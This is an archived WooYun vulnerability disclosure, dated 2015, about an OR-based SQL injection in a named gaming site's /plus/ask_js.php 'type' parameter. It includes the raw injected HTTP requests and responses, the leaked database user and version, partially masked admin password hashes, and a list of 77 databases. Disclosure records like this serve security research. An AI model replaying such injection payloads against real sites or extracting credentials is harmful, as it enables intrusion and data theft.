乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-21: 细节已通知厂商并且等待厂商处理中 2015-03-21: 厂商已经确认,细节仅向厂商公开 2015-03-31: 细节向核心白帽子及相关领域专家公开 2015-04-10: 细节向普通白帽子公开 2015-04-20: 细节向实习白帽子公开 2015-05-05: 细节向公众公开
www.07073.com一处or型注入,size based
R:GET /plus/ask_js.php?type=20856465450%20or%201&pagesize=6&tmp=ul HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Cache-Control: no-cacheHost: www.07073.comP:HTTP/1.1 200 OKServer: nginxDate: Fri, xx Mar 2015 xx GMTContent-Type: text/html; charset=gb2312Vary: Accept-EncodingVary: Accept-EncodingX-Cache: MISS from xnop013-CT-FJPT-248-84.fastcdn.comX-Cache: MISS from CT-SHHJ-190-96.fastcdn.comContent-Length: 2304
R:GET /plus/ask_js.php?type=20856465450%20or+0&pagesize=6&tmp=ul HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Cache-Control: no-cacheHost: www.07073.comP:HTTP/1.1 200 OKServer: nginxDate: Fri, xx Mar 2015 xxx GMTContent-Type: text/html; charset=gb2312Vary: Accept-EncodingVary: Accept-EncodingX-Cache: MISS from xnop013-CT-FJPT-248-84.fastcdn.comX-Cache: MISS from CT-SHHJ-190-96.fastcdn.comContent-Length: 69
user()='[email protected]'version()='5.6.10-log'database()='www07073'
ps:发现网站缓存设计有问题。为了证明问题,这里贴几个管理员
1 0 admin d44254f1082727xxxx <blank>2 0 zhangshu 2a8e55171fc68xxx <blank>17598496 0 xlkslbccdtks 77db0bb41dexxx <blank>5 0 huahuade 7c39370ab6b4de6xxx <blank>
这里所有数据表,影响所有用户吧
available databases [77]:[*] 123_07073[*] acg073[*] adv07073[*] advertising[*] android07073[*] askdata[*] atlas07073[*] baidu_xml_dev[*] baobei[*] bar07073[*] bbs073[*] bl07073[*] box07073[*] cache07073[*] cartoon[*] coderead[*] comment[*] datacenter[*] db07073[*] db07073_tx2[*] db07073qn[*] dbcache[*] discuz[*] dn07073[*] dnf07073[*] downloads[*] duandi[*] fahao073[*] fahao10[*] flash07073[*] giftcode[*] hdtemplates[*] hi07073[*] huodong[*] information_schema[*] iphonewy_x15[*] iphonewy_x20[*] jft073[*] kaifuopen_hzhks[*] kaifuopen_zjgtqxx[*] kc07073[*] kf07073[*] kf07073b[*] kf207073[*] kf77745[*] list07073[*] mesearch[*] mh073[*] mobilenews[*] molihai073[*] monitor[*] mysql[*] nycc[*] other_website[*] paihang07073[*] performance_schema[*] shop073[*] sy07073[*] team07073[*] tongji[*] top2011[*] tweibo[*] ui073[*] wap07073[*] webbox[*] weixin073[*] wenwen073[*] wow07073[*] www.13cr.com[*] www07073[*] www07073bak[*] xuan-astd[*] xweibo[*] youxi[*] zhuanchu[*] zhuanchu2[*] zt07073
危害等级:高
漏洞Rank:20
确认时间:2015-03-21 10:47
感谢提供漏洞信息
暂无